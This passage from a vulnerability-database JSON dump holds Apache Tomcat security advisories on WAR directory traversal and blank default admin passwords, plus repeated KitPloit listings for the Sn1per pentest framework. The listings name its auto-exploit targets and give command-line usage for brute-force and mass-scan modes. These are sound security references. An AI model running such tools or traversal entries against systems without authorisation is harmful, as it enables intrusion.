902650](<https://svn.apache.org/viewvc?view=rev&rev=902650>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 5.5.0-5.5.28 (Windows only)\n\n**Low: Unexpected file deletion in work directory** [CVE-2009-2902](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902>)\n\nWhen deploying WAR files, the WAR file names were not checked for directory traversal attempts. For example, deploying and undeploying `...war` allows an attacker to cause the deletion of the current contents of the host's work directory which may cause problems for currently running applications.\n\nThis was fixed in [revision 902650](<https://svn.apache.org/viewvc?view=rev&rev=902650>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 5.5.0-5.5.28\n\n**Low: Insecure default password** [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>)\n\nThe Windows installer defaults to a blank password for the administrative user. If this is not changed during the install process, then by default a user is created with the name admin, roles admin and manager and a blank password.\n\nAffects: 5.5.0-5.5.28\n\nThis was first reported to the Tomcat security team on 26 Oct 2009 and made public on 9 Nov 2009.\n\nThis was fixed in [revision 919006](<https://svn.apache.org/viewvc?view=rev&rev=919006>).", "cvss3": {}, "published": "2010-04-20T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 5.5.29", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2693", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2010-04-20T00:00:00", "id": "TOMCAT:0B64F54283D152613DC4C77D34E010AF", "href": "https://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T15:23:03", "description": "**Note:** _These issues were fixed in Apache Tomcat 6.0.21 but the release votes for the 6.0.21, 6.0.22 and 6.0.23 release candidates did not pass. Therefore, although users must download 6.0.24 to obtain a version that includes fixes for these issues, versions 6.0.21 onwards are not included in the list of affected versions._\n\n**Low: Arbitrary file deletion and/or alteration on deploy** [CVE-2009-2693](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693>)\n\nWhen deploying WAR files, the WAR files were not checked for directory traversal attempts. This allows an attacker to create arbitrary content outside of the web root by including entries such as `../../bin/catalina.sh` in the WAR.\n\nThis was fixed in [revision 892815](<https://svn.apache.org/viewvc?view=rev&rev=892815>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 6.0.0-6.0.20\n\n**Low: Insecure partial deploy after failed undeploy** [CVE-2009-2901](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901>)\n\nBy default, Tomcat automatically deploys any directories placed in a host's appBase. This behaviour is controlled by the autoDeploy attribute of a host which defaults to true. After a failed undeploy, the remaining files will be deployed as a result of the autodeployment process. Depending on circumstances, files normally protected by one or more security constraints may be deployed without those security constraints, making them accessible without authentication. This issue only affects Windows platforms.\n\nThis was fixed in [revision 892815](<https://svn.apache.org/viewvc?view=rev&rev=892815>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 6.0.0-6.0.20 (Windows only)\n\n**Low: Unexpected file deletion in work directory** [CVE-2009-2902](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902>)\n\nWhen deploying WAR files, the WAR file names were not checked for directory traversal attempts. For example, deploying and undeploying `...war` allows an attacker to cause the deletion of the current contents of the host's work directory which may cause problems for currently running applications.\n\nThis was fixed in [revision 892815](<https://svn.apache.org/viewvc?view=rev&rev=892815>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 6.0.0-6.0.20\n\n**Low: Insecure default password** [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>)\n\nThe Windows installer defaults to a blank password for the administrative user. If this is not changed during the install process, then by default a user is created with the name admin, roles admin and manager and a blank password.\n\nThis was fixed in [revision 881771](<https://svn.apache.org/viewvc?view=rev&rev=881771>).\n\nThis was first reported to the Tomcat security team on 26 Oct 2009 and made public on 9 Nov 2009.\n\nAffects: 6.0.0-6.0.20", "cvss3": {}, "published": "2010-01-21T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 6.0.24", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2693", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2010-01-21T00:00:00", "id": "TOMCAT:C3A9DD4DC4BB2C17C62CA8202CF2A834", "href": "https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:21", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:04:42", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:03:55", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- 